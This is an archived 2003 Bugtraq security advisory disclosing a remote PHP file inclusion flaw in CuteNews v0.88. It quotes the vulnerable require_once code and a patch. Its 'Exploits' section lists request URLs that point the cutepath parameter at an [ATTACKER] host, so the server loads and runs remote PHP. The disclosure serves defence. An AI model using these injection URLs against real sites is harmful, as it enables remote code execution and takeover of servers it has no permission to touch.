[29035] in bugtraq
PHP code injection in CuteNews
daemon@ATHENA.MIT.EDU (Over_G)
Tue Feb 25 11:57:03 2003
From: "Over_G" <overg@mail.ru>
To: vuln@security.nnov.ru, bugtraq@securityfocus.com,
staff@packetstormsecurity.org
Mime-Version: 1.0
Date: Tue, 25 Feb 2003 14:31:55 +0300
Reply-To: "Over_G" <overg@mail.ru>
Content-Type: text/plain; charset=koi8-r
Content-Transfer-Encoding: 8bit
Message-Id: <E18ndJT-000JS2-00@f19.mail.ru>
PHP source code injection in CuteNews
Informations :
===============================================
Script : CuteNews v0.88
Offical site : http://air.langame.net/
===============================================
PHP Scripts :
===============================================
shownews.php :
if(!$cutepath) $cutepath=".";
require_once("$cutepath/config.php");
{.........}
$all_news=file("$cutepath/news.txt");
===============================================
search.php :
require_once("$cutepath/config.php");
===============================================
comments.php :
if(!$cutepath){$cutepath=".";}
require_once("$cutepath/config.php");
===============================================
Exploits :
http://[VICTIM]/cutenews/shownews.php?cutepath=http://[ATTACKER]/
http://[VICTIM]/cutenews/search.php?cutepath=http://[ATTACKER]/
http://[VICTIM]/cutenews/comments.php?cutepath=http://[ATTACKER]/
with :
http://[ATTACKER]/config.php
http://[ATTACKER]/news.txt
Content config.php or news.txt:
Any PHP Code.
===============================================
Patch :
Replace
if(!$cutepath){$cutepath=".";}
require_once("$cutepath/config.php");
on $cutepath=".";
===============================================
Best Regards, Over_G [DWC Gr0up] and VenoM
Please visit: www.DWCgr0up.com www.OverG.com www.hack-tools.org
Mail: OverG@mail.ru VenoM88@mail.ru
